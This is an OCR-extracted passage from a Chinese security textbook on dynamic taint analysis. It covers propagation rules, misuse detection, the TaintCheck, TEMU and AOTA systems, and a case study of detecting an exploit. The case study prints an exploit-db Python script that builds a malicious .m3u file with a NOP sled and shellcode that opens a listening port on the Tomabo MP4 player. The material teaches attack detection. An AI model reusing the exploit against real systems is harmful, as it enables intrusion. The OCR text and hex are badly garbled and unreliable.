是 特殊 指令 ,该 类 指令 需要 为 每 一 种 特殊 情况 制定 单独 的 传播 规则 。 特 殊 指 令 主 要 包括 
两 类 ,一 类 是 清 零 指 令 , 另 一 类 是 单 操作 数 指令 。 下 面 对 每 一 种 类 型 的 传播 规则 进行 详细 
说 明 。 

将 所 有 指令 的 操作 过 程 抽象 为 一 个 映射 过 程 F, 即 F(INS): Y—fOO0 ,其 中 INS X 
示 程 序 的 指令 集合 {insi),X 表示 源 操 作 数 集合 {x;),Y 表示 目的 操作 数 集合 {y;) ,f 表示 
指令 的 运算 方法 。 而 对 于 传播 规则 来 讲 ,可 以 将 其 同样 看 成 是 一 个 映射 F, ANS): Y, = 
f.(X.) ,其 中 INS 表示 相同 的 指令 集合 ,X, 表示 源 操作 数 对 应 的 污点 集合 {xs} Y. 表示 目 
的 操作 数 污点 集合 {ys}。 其 中 任意 的 xs 或 者 ys 表示 的 是 源 操作 数 集合 或 者 目的 操作 数 
集合 中 对 应 的 污点 状态 表示 ,这 里 为 了 简化 起 见 , 用 x — 1 表示 第 i 个 源 操作 数 污 点 ,而 
用 yj; 二 0 表示 经 过 运算 后 第 j 个 目的 操作 数 没有 被 污染 。 根 据 以 上 描述 ,对 于 上 述 3 种 
规则 分 类 ,可 以 用 F, 给 出 具体 的 规则 定义 。 

1) 复制 规则 

对 于 复制 规则 来 说 ,将 F, 直接 定义 为 简单 的 XX 映射 ,即将 源 操作 数 的 污点 状态 直 
接 赋值 给 目的 操作 数 。 这 里 以 x86 指令 集中 的 mov 指令 为 例 进行 说 明 ,并 假设 该 指令 为 


mov eax, ebx 


对 于 该 条 指令 来 说 ,首先 明确 源 操 作 数 集合 X, 这 里 根据 mov 指令 的 语义 ,X 只 包含 
ebx 一 个 数据 项 ,因此 X — Cebx) ;同样 ,目的 操作 数 集合 Y 也 只 包含 一 个 元 素 eax, HI Y= 
{eax}。 而 对 于 mov 指令 来 说 ,其 对 应 的 映射 为 F(mov eax, ebx); eax 一 ebx, 这 样 即 可 
确定 传播 规则 为 

F,(mov eax, ebx): eax, —ebx, 
其 中 X, = (ebx) , Yı = (eax). 

2) 计算 规则 

对 于 计算 规则 来 说 ,将 F, 定义 为 运算 映射 ,这 里 同样 以 典型 的 计算 指令 add 为 例 进 
行 说 明 ,并 假设 该 指令 为 


add eax, ebx 


l 
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对 于 该 条 指令 ,同样 需要 知道 源 操作 数 集合 ,而 根据 其 语义 信息 可 知 ,X= (eax? 
ebx) ,而 Y 二 (eax'), 为 了 简化 过 程 , 先 不 考虑 标志 寄存 器 ,这 里 eax’ 和 eax! 都 表示 同一 
个 寄存 器 ,这 里 为 了 区 别 源 操作 数 和 目的 操作 数 而 特意 加 以 区 别 。 由 于 F(add eax, 
ebx) : eax 一 eax 十 ebx, 因 此 可 以 确定 传播 规则 为 

F,(add eax, ebx); eax! 一 eax? 十 ebx 
其 中 X,= (eax' ，ebx,) ,Y, 一 (eaxl ) 。 

3) 特殊 规则 

特殊 规则 的 设计 主要 是 为 了 处 理 原 始 指令 集中 含有 隐 含 操作 数 、 常 值 结 果 等 形式 的 
特殊 指令 。 这 里 以 push 指令 和 xor 指令 作为 两 种 特殊 类 型 的 实例 进行 详细 说 明 。 

movsd 

对 于 类 似 该 条 指令 来 说 ,其 隐 含 了 源 操 作 数 和 目的 操作 数 [esi] 和 [edi] ,因此 在 进行 
传播 规则 设计 时 ,需要 对 这 种 情况 显 式 填充 相应 的 源 操作 数 集合 和 目的 操作 数 集合 , 即 
X— (Lesi]) . Y= ([edi]) .F(émovsd) : [edi ]— [esi ] ,因此 其 对 应 的 传播 规则 可 以 根据 复制 
规则 来 完成 , 即 

F,Cmovsd) : [edi], ^ [ esi ]. 
Hp X, —(Q(esi]o.Y.—(([edi]). 

对 于 该 指令 来 说 ,尽管 xor 可 以 看 成 一 条 运算 指令 ,但 是 由 于 其 操作 数 相同 ,因此 其 
计算 结果 为 eax 恒 等 于 0。 而 对 于 污点 分 析 来 说 ,由 于 最 终 的 结果 不 再 受 污点 的 影响 ,此 
时 需要 将 eax 的 污点 状态 进行 漂白 , 即 eax, 恒 等 于 0。 

除了 以 上 给 出 的 movsd 和 xor 指令 以 外 , 表 7-1 还 列 出 了 其 他 几 种 常见 的 需要 进行 
特殊 规则 设计 的 指令 。 

表 7-1 特殊 污点 传播 规则 


























特殊 指令 类 型 指令 实例 传播 规则 
push eax [esp—4].=eax., X, — (eax)  Y.— (Lesp—4].) 
— pop eax eax,— [esp]. X.— ([esp]) . Yı = {eax} 
call eax eip, —eax,, X, —(eip.) . Y, —(eax) 
ret eip:=[espj', X; — ([esp].) » Y, = (eip.) 
sub eax, eax eaxı=0, X,— {eax}, Y, = (eaxi) 
常 值 结果 and eax, 0 eax —0, X, —(eax) . Y, = {eax:} 
or eax,l eax,—0, X, — (eax ) , Y,—(eax) 











735 污点 误 用 检测 
在 进行 污点 传播 计算 的 过 程 中 ,不 仅 要 时 刻 跟 踪 记 录 污 点 的 扩散 情况 ,同时 还 需要 在 


第 7 章 污点 传播 分 析 


程序 的 “关键 点 ”检测 是 否 有 污点 数据 被 错误 使 用 , 即 污点 误 用 检测 。 这 里 所 说 的 关键 点 
并 没有 一 个 国定 的 定义 , 依 不 同 的 应 用 场景 而 定 。 例 如 ,在 漏洞 利用 攻击 检测 场景 中 ,将 
程序 发 生 跳 转 的 位 置 称 为 关键 点 ,因为 需要 在 这 里 判断 程序 的 跳 转 目 标 是 否 由 污点 数据 
控制 ;而 在 敏感 信息 泄露 检测 场景 中 , 则 将 程序 关键 点 定义 为 所 有 向 外 发 送 数据 的 位 置 ， 
此 时 需要 检测 发 送 数据 中 是 否 有 被 标记 为 污点 的 敏感 数据 内 容 。 

最 后 ,在 确定 程序 的 关键 点 后 ,还 需要 给 出 相关 的 误 用 检测 规则 。 这 些 规则 描述 了 在 
程序 关键 点 处 的 污点 满足 什么 样 的 条 件 才 称 为 “ 误 用 ”"。 尽 管 大 多 数 规则 只 需要 检测 是 否 
在 程序 的 关键 点 处 存在 污点 即 可 , 即 存在 性 检测 ,但 是 在 较为 复杂 的 应 用 场景 中 ,还 需要 
进一步 使 用 特殊 的 误 用 规则 才能 有 效 地 完成 相关 任务 。 例 如 ,在 漏洞 攻击 检测 和 敏感 数 
据 泄露 检测 的 场景 中 ,只 需要 判断 在 程序 跳 转 或 者 程序 发 送 数据 的 时 候 , 跳 转 目标 或 者 发 
送 数据 中 是 否 含有 污点 数据 即 可 ;但 在 利用 污点 分 析 方法 进行 导向 型 模糊 测试 的 过 程 中 ， 
为 了 寻找 到 校 验 和 检验 的 位 置 ,不 仅 需要 在 程序 所 有 条 件 跳 转 的 位 置 对 标志 寄存 器 进行 
污点 存在 性 检测 ,还 需要 进一步 判断 标志 寄存 器 是 否 由 超过 一 定数 量 的 污点 数据 计算 得 
到 的 。 


7.4 典型 系统 实现 


在 动态 污点 分 析 技 术 发 展 的 10 多 年 间 涌 现 出 了 众多 优秀 的 系统 平台 ,从 系统 的 研发 
目标 来 看 主要 可 以 分 为 以 下 3 类 : 第 一 类 是 早期 以 解决 典型 安全 问题 为 目标 的 分 析 应 用 
系统 ,例如 TaintBochs, TaintCheck 以 及 TaintScope 等 ;第 二 类 是 以 搭建 污点 分 析 基 础 平 
台 、 系 统 库 为 目标 的 工作 ,典型 的 有 TEMU 和 libdft 等 ;第 三 类 是 目前 以 实用 化 为 目标 的 
相关 系统 ,包括 AOTA 和 DECAF 等 。 限 于 本 书 的 篇 幅 , 接 下 来 选择 上 述 3 类 系统 中 具 
有 代表 性 的 工作 进行 详细 介绍 。 

741 TaintCheck 系统 

正如 7. 1. 2 节 所 述 , TaintCheck 是 J. Newsome 等 人 在 2005 年 解决 CodeRed、 
Slammer 等 蠕虫 检测 问题 时 提出 的 一 套 面向 恶意 代码 自动 检查 、 分 析 以 及 攻击 特征 生成 
的 动态 污点 分 析 系 统 , 该 系统 的 组 成 如 图 7-14 所 示 , 其 实现 过 程 主要 是 借助 了 二 进 制 代 
码 插 装 工具 Valgrind 来 实现 程序 的 动态 跟踪 。 


TaintSeed TaintTracker TaintAssert 


pm 

(s ) a 

me" " mdp 污点 作为 

T ER à 攻击 
网 络 数据 || mat gi 


数据 缓冲 区 | 非 污点 数据 




















图 7-14  TaintCheck 系统 组 成 


TaintCheck 系统 主要 由 3 个 功能 模块 组 成 , 即 TaintSeed、TaintTracker 以 及 


TaintAssert。 其 中 TaintSeed 负责 检查 程序 从 外 部 引入 的 不 可 信 数 据 , 并 将 其 标记 为 污 
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点 源 ;TaintTracker 负责 跟踪 污点 数据 在 程序 指令 执行 时 的 传播 情况 ,并 计算 最 终 的 结果 
是 被 污点 感染 ;TaintAssert 负责 检查 污点 数据 的 使 用 是 否 违规 ,并 对 违规 行为 发 出 告 
或 交 由 后 续 分 析 程序 处 理 。 
1. TaintSeed 模块 
该 功能 模块 主要 是 将 程序 从 外 部 引入 的 不 可 信 数 据 标 记 为 污点 源 。 由 于 是 检测 网 络 
蠕虫 ,因此 在 实现 过 程 中 ,将 所 有 来 自 网 络 Socket 通信 的 数据 作为 默认 污点 源 进 行 标记 。 
由 于 该 模块 是 可 配置 的 ,因此 ,对 于 来 自 文件 或 者 命令 行 输入 的 数据 同样 也 可 以 进行 污点 
源 标记 。 
此 外 ,在 实现 过 程 中 ,该 模块 还 将 为 任意 字 节 的 内 存 分 配 AB 的 影子 内 存 , 其 中 存放 
了 一 个 指向 污点 记录 结构 的 指针 (简称 影子 指针 ) ,该 指针 为 空 表示 当 前 位 置 上 没有 污点 
数据 。 污 点 记录 结构 则 主要 记录 了 当前 污点 数据 相关 的 系统 调用 号 、 当 前 程序 栈 的 快照 
以 及 实际 存放 的 数据 内 容 , 这 些 内 容 都 为 后 续 进 行 攻击 代码 深入 分 析 提 供 了 丰富 的 上 下 
文 环 境 信 息 。 由 于 在 分 析 过 程 中 需要 频繁 地 动态 分 配 或 者 释放 内 存 , 该 模块 还 利用 类 似 
页 表 形式 的 结构 来 保证 分 析 效 率 。 最 后 ,该 模块 可 以 根据 不 同 的 应 用 需求 ,取消 复杂 污点 
记录 功能 ,只 通过 单个 位 来 表示 对 应 内 存 位 置 上 是 否 存 在 污点 数据 。 
2. TaintTracker 模块 
该 模块 跟踪 程序 执行 的 每 条 指令 并 计算 最 终 的 结果 是 否 为 污点 。 由 于 该 模块 所 依赖 
的 Valgrind 工具 提供 了 一 种 称 为 UCode 的 中 间 指 令 , 因 此 该 模块 所 实现 的 相关 功能 也 
是 在 该 指令 集 上 完成 的 。 具 体 来 说 ,该 模块 首先 将 UCode 指令 集 划 分 为 3 种 类 型 : 数据 
移动 指令 算术 指令 以 及 空 指令 和 直接 跳 转 指令 。 其 中 在 处 理 数 据 移 动 指令 时 ,规定 如 果 
源 操作 数 中 有 任意 字 节 数据 为 污点 , 则 目的 操作 数 全 部 为 污点 ;对 于 算术 指令 ,如 果 操 作 
数 中 有 任意 字 节 为 污点 , 则 计算 结果 全 部 为 污点 ;对 于 空 指令 和 直接 跳 转 指令 ,由 于 没有 
产生 任何 数据 的 移动 或 计算 ,因此 忽略 这 些 指 令 对 于 污点 分 析 的 影响 。 以 上 规则 和 7. 3. 
4 节 介 绍 的 规则 基本 一 致 。 
此 外 ,在 具体 实现 的 过 程 中 ,对 于 计算 结果 为 污点 的 指令 ,该 模块 提供 了 两 种 记录 形 
x. 一 种 是 直接 将 目的 操作 数 的 影子 指针 指向 源 操作 数 的 影子 指针 所 指向 的 污点 记录 结 
构 ; 另 一 种 是 为 了 能 够 在 后 续 分 析 过 程 中 追踪 整个 污点 分 析 的 过 程 ,为 每 一 次 产生 污点 的 
目的 操作 数 重新 分 配 一 个 单独 的 污点 记录 结构 。 尽 管 后 一 种 记录 方式 严重 影响 分 析 效 
率 ,但 是 在 分 析 恶 意 代码 的 具体 攻击 行为 时 具有 极其 重要 的 参考 价值 。 
3. TaintAssert 模块 
该 模块 正 是 完成 7. 3. 5 节 所 述 的 污点 误 用 检测 工作 ,其 默认 情况 下 用 来 检测 格式 化 
字符 串 攻 击 以 及 控制 流 劫持 攻击 ,具体 的 检测 目标 包括 : 
。 跳 转 地 址 。 该 模块 所 负责 检测 的 跳 转 地 址 包括 函数 返回 地 址 、 函 数 指针 或 者 函数 
指针 偏 移 量 。 由 于 大 部 分 攻击 的 相同 行为 都 是 希望 控制 程序 的 执行 流程 ,因此 通 
过 覆盖 这 些 敏 感 数据 即 可 完成 攻击 任务 。 但 对 于 普通 的 正常 程序 来 说 , 却 很 少 有 
主动 修改 上 述 数据 内 容 的 情况 。 正 是 考虑 到 上 述 情况 ,该 模块 通过 检查 跳 转 地 址 
中 是 否 含有 污点 数据 来 完成 相关 的 攻击 过 程 检测 。 
* 格式 化 字符 串 。 该 模块 还 默认 检测 printf 类 似 函 数 调用 的 相关 参数 中 是 否 存 在 
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污点 数据 。 由 于 攻击 者 可 以 通过 特殊 的 格式 化 字符 串 来 实现 程序 信息 泄露 或 者 任 
意 地 址 写 任 意 内 容 的 攻击 ,因此 监控 相关 函数 的 参数 中 是 否 有 污点 数据 可 以 保证 
程序 免 受 上 述 攻击 的 威胁 。 需 要 说 明 的 是 ,和 跳 转 地 址 检测 不 同 ,对 于 格式 化 字符 
串 主要 是 使 用 监控 上 层 的 系统 函数 调用 ,如 果 程 序 实现 了 自己 的 类 似 功能 函数 , 则 
无 法 保证 完成 攻击 检测 任务 。 

。 系统 调用 参数 。 尽 管 默认 情况 下 不 会 对 所 有 系统 调用 进行 参数 污点 检测 ,但 是 对 
于 一 些 特殊 的 可 被 攻击 者 恶意 使 用 的 系统 调用 仍然 进行 严格 的 参数 污点 检测 。 例 
如 对 于 execve 函数 ,攻击 者 可 以 通过 外 部 数据 任意 自 改 其 函数 参数 来 使 得 程序 调 
用 任意 程序 。 

如 图 7-15 所 示 , 利 用 上 述 污点 误 用 检测 规则 ,TaintCheck 系统 可 以 有 效 对 类 似 格式 

化 字符 串 攻 击 、 缓 冲 区 溢出 攻击 、 多 次 释放 以 及 堆 溢 出 攻击 进行 有 效 检测 。 


次 
aS a "a d 
SU av Af 
w * á 
返回 地 址 
=] 跳 转 地 址 
默认 规则 
函数 指针 
[5] 函数 指针 偏 移 
可 选 规则 
系统 调用 参数 
函数 调用 参数 
图 7-15 TaintCheck 系统 检测 的 攻击 类 型 
742 TEMU 系统 


TEMU 系统 是 著名 开源 二 进 制 分 析 平台 BitBlaze 的 重要 组 成 部 分 ,其 主要 负责 完 
程序 的 动态 分 析 任 务 , 图 7-16 展示 了 TEMU 系统 的 相关 组 成 。 和 上 述 TaintCheck 系统 
相 比 ,TEMU 系统 不 仅 在 硬件 模拟 器 QEMU 的 基础 上 实现 了 面向 全 系统 跟踪 的 污点 分 
析 功 能 ,同时 通过 基础 污点 分 析 引 擎 和 丰富 的 调用 接口 实现 了 一 套 高 可 用 的 插件 机 制 , 利 
用 该 机 制 可 以 快速 构建 面向 不 同 应 用 领域 的 污点 分 析 应 用 系统 。 因 此 ,可 以 将 TEMU 
系统 看 成 是 一 个 构建 不 同 污点 分 析 应 用 的 基础 平台 。 

TEMU 系统 主要 由 3 部 分 组 成 ,包括 系统 语义 提取 模块 .污点 分 析 引 擎 以 及 插件 机 
制 。 语义 提取 模块 主要 负责 从 运行 在 硬件 模拟 器 之 上 的 虚拟 系统 中 提取 必要 的 系统 层 的 
语义 信息 ,例如 系统 版 本 、 进 程 信息 等 。 污点 分 析 引 擎 则 主要 负责 在 虚拟 系统 运行 时 根据 
相关 配置 完成 动态 污点 分 析 功 能 。 插件 机 制 则 通过 已 封装 好 的 调用 接口 为 用 户 提供 丰富 
的 系统 运行 和 污点 分 析 信 息 。 
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图 7-16 TEMU 系统 组 成 
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1. 语义 提取 模块 

该 模块 主要 负责 提取 操作 系统 层面 上 的 语义 信息 ,包括 进程 .模块 .线程 以 及 符号 等 
信息 。 下 面 详细 介绍 每 种 信息 的 获取 方法 。 

首先 ,在 进程 和 模块 信息 的 获取 方面 ,主要 是 通过 两 种 技术 方案 来 实现 : 一 种 是 面 
向 Windows 系统 环境 的 方案 , 即 通过 在 虚拟 系统 中 安装 额外 的 “模块 通告 器 "内核 模块 
来 获取 进程 创建 和 模块 加 载 等 事件 ; 另 一 种 是 面向 Linux 系统 环境 的 方案 , 即 通过 动态 
解析 内 核 数据 结构 以 及 添加 相应 的 系统 钩子 函数 来 实时 获取 进程 创建 和 模块 加 载 等 

其 次 ,在 线程 获取 方面 ,主要 通过 分 析 进 程 虚拟 地 址 空间 中 的 数据 结构 实现 了 
Windows 系统 上 复杂 应 用 的 多 线程 信息 ,而 对 于 Linux 系统 目前 暂 不 支持 多 线程 的 
提取 。 

最 后 ,在 符号 获取 方面 ,主要 通过 动态 解析 PE 文件 结构 的 方式 来 获取 导出 符号 表 中 
的 相关 名 字 和 偏 移 。 由 于 符号 表 往 往 能 够 提供 较为 完整 的 函数 语义 信息 ,因此 ,通过 获取 
符号 偏 移 和 程序 各 个 模块 基 址 即 可 确定 程序 运行 时 所 调用 的 库 函 数 ,进而 可 以 有 效 提高 
程序 动态 分 析 的 效率 。 同 样 ,目前 该 功能 只 在 支持 PE 结构 的 Windows 系统 上 完成 ,而 
对 于 以 ELF 文件 格式 为 主 的 Linux 系统 暂 不 支持 符号 获取 功能 。 

2. 污点 分 析 引 擎 

尽管 该 模块 的 实现 和 已 有 的 污点 分 析 系统 较为 相似 ,但 为 了 能 够 更 大 范围 地 支持 全 
系统 的 污点 扩散 跟踪 ,该 模块 还 添加 了 对 于 内 存 交换 以 及 硬盘 读 写 的 污点 分 析 支 持 。 

首先 ,在 影子 内 存 的 实现 方面 .其 主要 采用 了 TaintCheck 系统 所 使 用 的 类 页 表 结 构 
来 提高 内 存 的 使 用 效率 ,并 通过 污点 记录 结构 存放 包括 物理 内 存 、 人 处 理 器 寄存 器 \ 硬 件 磁 
盘 、 网 络 接口 缓冲 区 在 内 的 污点 源 信息 。 其 中 ,通过 硬件 磁盘 的 影子 内 存 可 以 跟踪 被 内 存 
换 出 或 者 写 人 到 磁盘 文件 的 污点 数据 。 

其 次 ,在 污点 源 标志 实现 方面 ,TEMU 系统 以 插件 的 形式 拦截 外 部 污点 源 数据 ,主要 
包括 两 类 数据 : 一 类 是 从 硬件 接口 获取 的 原始 数据 ,包括 键盘 、 网 络 接 口 以 及 硬盘 等 ; 男 
一 类 是 具有 上 层 抽象 语义 的 数据 对 象 ,例如 函数 输出 结果 以 及 应 用 程序 或 者 系统 内 核 的 
结构 化 数据 等 。 
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最 后 ,在 污点 分 析 实 现 方面 ,该 引擎 主要 是 通过 监控 和 污点 数据 相关 的 处 理 流程 来 完 
成 污点 分 析 过 程 。 其 中 ,相关 处 理 流程 包括 数据 移动 过 程 、 内 存 直 接 访问 、 计 算 操 作 等 过 
程 ,同时 也 考虑 类 似 常 值 指令 的 情况 (例如 ,xor eax, eax)。 需 要 说 明 的 是 ,TEMU 系统 
提供 了 非常 方便 的 污点 分 析 策 略 定制 接口 ,这 意味 着 除了 默认 的 传播 规则 以 外 ,可 以 由 用 
户 根据 不 同 的 应 用 需求 来 提供 自 定义 规则 。 例 如 ,在 一 些 字 符 转 换 的 过 程 中 ,程序 往往 需 
要 涉及 查 表 操作 ,此 时 就 需要 定制 一 些 保证 污点 能 够 在 查 表 过 程 中 继续 传播 的 策略 (具体 
方法 可 参见 7. 3.4 节 )。 

3. 接口 与 插件 机 制 

为 了 能 够 最 大 化 利用 分 析 系 统 提供 给 用 户 的 程序 动态 运行 信息 ,TEMU 提供 了 一 套 
较为 完整 的 分 析 方 法 和 回调 函数 。 通 过 使 用 这 些 接口 ,用 户 可 以 针对 不 同 的 应 用 需求 快 
速 搭 建 相应 的 解决 方案 。 目 前 ,TEMU 为 用 户 插件 提供 的 功能 包括 : 

(1) 查询 或 者 设置 任意 内 存单 元 或 者 处 理 器 寄存 器 中 的 值 。 

(2) 查询 或 者 设置 任意 内 存单 元 或 者 寄存 器 中 的 污点 信息 。 

(3) 在 指定 系统 方法 的 入 口 和 出 口 处 注册 或 者 注销 钧 子 函 数 。 

(4) 在 任意 时 刻 查询 当前 系统 的 语义 信息 ,包括 进程 .模块 以 及 线程 。 
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AOTA(Application Oriented Tainting Analysis) 系统 是 由 中 国 科 学 院 软 件 所 在 多 年 
的 实践 基础 上 搭建 的 一 套 面 向 Windows 大 规模 二 进 制 应 用 程序 的 高 实用 性 动态 污点 分 
析 系 统 , 图 7-17 展示 了 该 系统 的 相关 组 成 。 与 TEMU 系统 相 比 ,AOTA 系统 的 主要 特 
点 有 以 下 3 点 : 首先 ,在 硬件 虚拟 化 平台 上 构建 完全 透明 的 动态 分 析 环 境 ;其 次 ,提供 离 
线 或 者 半 在 线 污 点 分 析 , 保 证 对 于 大 规模 程序 的 分 析 效 率 ;最 后 ,在 系统 级 重 放 的 基础 上 
构建 自动 化 分 析 与 并 行 化 分 析 过 程 。 


程序 动态 | RRI ,| 程序 执行 | Be [ss rss. [eres p 污点 回溯 | qul 
监控 系统 | | 集合 重 放 系 统 | | 序 烈 h | 环 : 分 析 系统 | | 指令 分 析 系统 | “| 结果 
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图 7-17 AOTA 系统 组 成 


AOTA 系统 主要 由 程序 动态 监控 子 系统 、 程 序 执行 重 放 子 系统 、 污 点 传播 与 回溯 分 
析 子 系统 组 成 。 其 中 程序 动态 监控 子 系统 主要 负责 操作 系统 语义 的 透明 性 分 析 , 和 
TEMU 类 似 , 可 提取 进程 .模块 以 及 线程 等 信息 ;程序 执行 重 放 子 系统 主要 负责 操作 系统 
级 的 记录 与 重 放 , 通 过 该 功能 可 以 构建 样本 分 析 快 照 库 ,为 后 续 进行 半 在 线 以 及 自动 化 和 
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并 行 化 分 析 提 供 技术 保障 ;污点 传播 和 回溯 分 析 子 系统 主要 面向 Windows 大 规模 程序 的 
动态 分 析 ,提供 灵活 的 配置 选项 ,对 任意 指定 的 离线 记录 文件 或 者 样本 快照 库 进 行动 态 污 

1. 程序 动态 监控 子 系统 

和 TEMU 需要 在 虚拟 系统 内 安装 驱动 的 方式 不 同 ,AOTA 系统 在 硬件 虚拟 化 平台 
QEMU 的 基础 上 ,结合 Windows 底层 内 核 结构 逆向 经 验 ,实现 了 一 套 完 全 透明 化 的 程序 
动态 监控 子 系统 。 该 系统 仅 依 赖 由 硬件 虚拟 化 平台 提供 的 原始 信息 即 可 实现 对 于 上 层 操 
作 系 统 以 及 其 中 的 程序 进行 识别 和 提取 。 图 7-18 是 AOTA 系统 捕获 到 的 在 Windows 7 
系统 上 运行 的 各 个 进程 信息 以 及 监控 程序 的 实时 运行 情况 。 


CTDAMEENLISLIC AVEC LI PDGVEE [5t ELAMCELLITET. 
/hone/aota/aotasrc/dta qemu trace/dtaTrace/bin/genu-Syst -soundhw all - 
/home/aota/DataDisk/win7-os/win7Office2OlÜTest!.img | ltesti 了 
hone/acta/DataDi sk/config/winTeng conf g [| 





图 7-18 AOTA 系统 捕获 到 的 进程 信息 


2. 污点 传播 与 回溯 分 析 子 系统 

尽管 通过 实现 面向 中 间 语 言 的 污点 传播 计算 有 助 于 摆脱 对 特定 语言 的 束缚 ,但 是 在 
原始 指令 转化 为 中 间 语 言 的 过 程 中 ,往往 会 丢失 原始 程序 相关 的 指令 位 置信 息 。 因 此 ,为 
了 确保 后 续 程 序 分 析 过 程 的 精确 性 和 高 效 性 .AOTA 以 Intel x86 指令 集 为 基础 设计 了 
一 套 较 为 完整 的 传播 规则 集 ,其 中 不 仅 涵盖 了 常用 的 基础 指令 集 ,还 包括 了 复杂 的 多 媒体 
指令 集 以 及 浮 点 指令 集 等 。 目 前 ,.AOTA 系统 支持 x86 指令 及 传播 规则 数量 多 达 370 

此 外 ,为 了 完成 污点 传播 过 程 的 计算 ,AOTA 系统 在 QEMU 系统 的 基础 上 实现 了 指 
令 级 和 函数 级 的 程序 执行 过 程 记录 功能 。 其 中 ,指令 级 的 记录 过 程 主要 在 QEMU 进行 
指令 翻译 的 过 程 中 实现 ,而 函数 级 的 记录 则 主要 在 进行 代码 块 翻译 的 过 程 中 实现 。 

此 外 ,为 了 尽 可 能 保证 对 大 规模 应 用 程序 进行 高 效 的 动态 污点 分 析 ,AOTA 系统 利 
用 了 离线 分 析 的 思想 ,即将 程序 执行 记录 和 污点 分 析 和 剥离 ,进而 避免 由 于 在 线 分 析 导 致 的 
运行 开销 。 此 外 ,为 了 进一步 提高 污点 分 析 效 率 .AOTA 系统 还 利用 DEFINE-USE 思想 
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实现 了 基于 回溯 的 污点 分 析 方 法 。 此 外 ,考虑 到 回溯 方法 的 效率 问题 ,AOTA 系统 同样 
也 实现 了 基于 数字 多 标签 的 污点 传播 功能 。 


7.5 典型 实例 分 析 
本 节 通 过 一 个 实例 向 读者 介绍 如 何 利用 污点 分 析 方法 进行 漏洞 利用 攻击 检测 。 


选择 的 分 析 对 象 是 - 款 含有 栈 溢出 漏洞 的 MP4 播放 器 Tomabo ,利用 ea ij s 
FE 意 代码 执行 攻击 。 图 7-19 是 利用 该 漏洞 在 本 地 开放 恶意 监听 端口 4444 的 攻击 





效果 。 


加 mm ene AAFO S di 2 A 





图 7-19 栈 溢 出 漏洞 利用 攻击 效果 


751 分 析 环 境 搭 建 


本 次 实例 分 析 采 用 了 7. 4. 3 节 介 绍 的 AOTA 系统 ,其 具体 的 运行 环境 以 及 虚拟 机 配 


置信 息 如 表 7-2 所 示 。 





表 7-2 AOTA 运行 环境 及 虚拟 机 配置 说 明 

















运行 环境 | 虚拟 机 配置 
CPU Intel i7-4790 | 操作 系统 Windows 7 SP1 
内 存 8GB | 内 存 2GB 
硬盘 2TB | 脆弱 程序 Tomabo 3.11.6 
操作 系统 Ubuntu 15. 04 | 其 他 程序 Python 2.7 











行 AOTA 系统 的 截图 ,其 中 在 该 虚拟 机 中 已 部 署 存 
际 进程 名 称 为 MP4Player. exe 程序 (进程 ID 为 





图 7-20 是 在 表 7-2 所 示 环 境 下 
在 栈 溢出 漏洞 的 Tomabo 程序 ,其 
2508)。 

此 外 ,为 了 触发 该 漏洞 ,还 需要 运行 相关 的 PoC 样本 ,该 样本 目前 可 以 在 exploit-db 
. com 网 站 上 获得 ,图 7-21 是 在 该 网 站 上 获取 的 可 生成 PoC 样本 的 Python 脚本 。 


运 
实 
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图 7-20 AOTA 监控 下 的 脆弱 程序 运行 





file -"whatever.m3u" 












load = "\x41" * 1028 
load "AxebVx08Vx90 x90" 
2 load \xA9\x1C\x40\x80" 
2€ load x90" * 16 
7 load ("\xdb\xde\xbd\xbc\x9e\x98\xd8\xd9\x74\x24\xf4\x5f\x29\xc9\xb1" 


28 “\x48\x31\x6f\x18\x83\x6f\x18\x83\xef\x40\x7c\x6d\x24\x58\x83" 
29 "\xBe\xd5\xa@\x64\x86\x38\x91\xa4\x7c\x380\x81\x14\xf6\x14\x2d" 
e "\xde\x5a\x8d\xa6\x92\x72\xa2\x@f\x18\xa5\x8d\x98\x31\x95\x8c" 
31 "\x12\x48\xca\x6e\x2b\x83\xIf\x6e\xőc\xfe\xd2\x22\x25\x74\x40" 
"\xd3\x42\xc@\x59\x58\x18\xc4\xd9\xbd\xe8\xe7\xc8\x13\x63\xbe”" 
3 "\xca\x92\xa@\xca\x42\x8d\xa5\xf7\x1ld\x26\x1d\x83\x9f\xee\x6c" 
34 "\x6cC\x33\xcf\x41\x9f\x4d\x17\x65\x48\x38\x61\x96\xfd\x3b\xb6" 
j5 | “\xe5\xd9\xce\x2d\x4d\xa9\x69\x8a\x6c\x7e\xef\x59\x62\xcb\x7b" 
3€ "\x85\x66\xca\xa8\x3d\x92\x47\x4f\x92\x13\x13\x74\x36\x78\xc7" 
“\x15\x6f\x24\xa6\x2a\x6f\x87\x17\x8f\xfb\x25\x43\xa2\xal\x21" 
"\xa@\x8f\x59\xbl\xae\x98\x2a\x83\x71\x33\xaS5\xaf\xfa\x9d\x32" 
“\xd@\xd@\x5a\xac\x2f\xdb\x9a\xe4\xeb\x8f\xca\x9e\xda\xaf\x80" 
"\x5e\xe3\x65\x3c\x57\x42\xd6\x23\x9a\x34\x86\xe3\x35\xdc\xcc" 
"AxebVx6aVxfcVxeeVx21Nx03Vx94Vx12XxcaVx3dVx38Vx9aVx2cVx57Vxde" 
"\xca\xe7\xc@\x12\x29\x38\x76\x6d\x1b\x68\x18\x26\x4d\xaf\x1f" 
"\xb7\x5b\x87\xb7\x33\x88\x13\xa9\x44\x85\x33\xbe\xd2\x53\xd2" 
"\xB8d\x43\x63\xff\x64\x83\xf1\x84\x2f\xd4\x6d\x87\x16\x12\x32" 
"\xf8\x7d\x29\xfb\x6c\x3e\x45\x@4\x61\xbe\x95\x52\xeb\xbe\xfd" 
“\x82\x4f\xed\x18\x4d\x5a\x81\xb1\xd8\x65\xf@\x66\x4a\x@e\xfe” 
"\x51\xbc\x91\x81\xb4\x3c\xed\xd7\xf@\x4a\x1f\xe4") 


load += "\x44" * (1800 - len(load)) 


writeFile - open (file, "w") 
writeFile.write(load) 
writeFile.close() 


图 7-21 生成 PoC 样本 的 Python 脚本 
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在 





在 进行 污点 传播 跟踪 之 前 ,首先 需要 明确 监控 的 目标 程序 以 及 污点 源 。 由 于 漏洞 存 
F Tomabo 程序 中 ,因此 将 其 作为 监控 目标 ;同时 ,由 于 是 通过 读 取 文 件 poc. m3u 的 方 
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式 触 发 漏洞 ,因此 将 实时 监控 ReadFile 函数 调用 过 程 ,判断 其 读 取 的 文件 名 ,并 将 相应 的 
内 容 作 为 污点 源 。 图 7-22 是 通过 AOTA 获取 的 脆弱 程序 在 读 取 PoC 样本 时 所 产生 的 污 
点 源 信息 ,该 信息 格式 为 “记录 ID 缓冲 区 地 址 ”数据 长 度 ”文件 偏 移 ”。 





© Recent B m 


Q Home 





